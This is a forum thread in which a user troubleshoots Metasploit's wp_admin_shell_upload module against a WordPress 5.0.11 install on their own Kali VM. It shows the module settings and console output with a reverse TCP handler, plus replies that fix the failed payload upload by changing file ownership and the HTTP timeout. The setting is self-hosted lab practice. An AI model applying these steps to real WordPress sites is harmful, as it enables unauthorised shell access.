File upload in Wordpress

So, I am trying to run this exploit through metasploit, all done at the same Kali Linux VM. I am trying to attack from my VM to the same VM.
Also thinking of making a room in the process.

kali linux system(latest) apache: Server version: Apache/2.4.46 (Debian), Server built: 2021-01-11T10:58:23 mariadb: mariadb Ver 15.1 Distrib 10.5.8-MariaDB, for debian-linux-gnu (x86_64) using EditLine wrapper PHP: PHP 7.4.11 (cli) (built: Oct 6 2020 10:34:39) ( NTS )

Wordpress: version 5.0.11, No plugins

Metasploit: metasploit v6.0.16-dev

exploit: unix/webapp/wp_admin_shell_upload

PASSWORD: REDACTED1

RHOSTS: 192.168.116.128 (ip a: lo: … eth0: inet 192.168.116.128/24

TARGETURI /wordpress/ (Wordpress directory: /var/www/html/wordpress)

USERNAME: REDACTED4

LHOST: 192.168.116.128

-It’s the same, because I am trying to do the exploit from my local metasploit to the same Virtual Machine, all at once.

show targets:
0 Wordpress

set target 0
sh: 0: getcwd() failed: No such file or directory
target => 0

msf6 exploit(unix/webapp/wp_admin_shell_upload) > run
sh: 0: getcwd() failed: No such file or directory

[] Started reverse TCP handler on 192.168.116.128:4444
[
] Authenticating with WordPress using admin:password1234…
[+] Authenticated with WordPress
[] Preparing payload…
[
] Uploading payload…
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
[*] Exploit completed, but no session was created.

So, obviously I am doing something wrong. Can somebody help me out? Thanks!

From what I know, there are 2 reasons. The first reason being that you simply don’t have permission to modifiy anything nor add anything. This could be either because your user in wordpress doesn’t have the admin role or the files in your wordpress directory are simply not writable by the account that runs the webserver. Your webserver should in theory be ran as www-data. So you should make sure that all the files in your wordpress directory are writable by www-data. You can achieve this by running “chown www-data:www-data /Path/to/wordpress”. If that’s not the problem, then it could be because there is a delay between the requests that metasploit sents. In this module, by default, there is a “HTTPClientTimeout” flag. I think it’s default value is 30 seconds or something. So if you know that your wordpress instance is running kinda slowly, you could try increasing that timeout with : "set HttpClientTimeout 300 ". This command will put the timeout as 300 seconds. Hope this helps.

1 Like

Setting HTTPClientTimeout to 120 worked for me. Since it seemed to take almost 2 minutes for me, I probably could have set it to a higher value. Thank you!

1 Like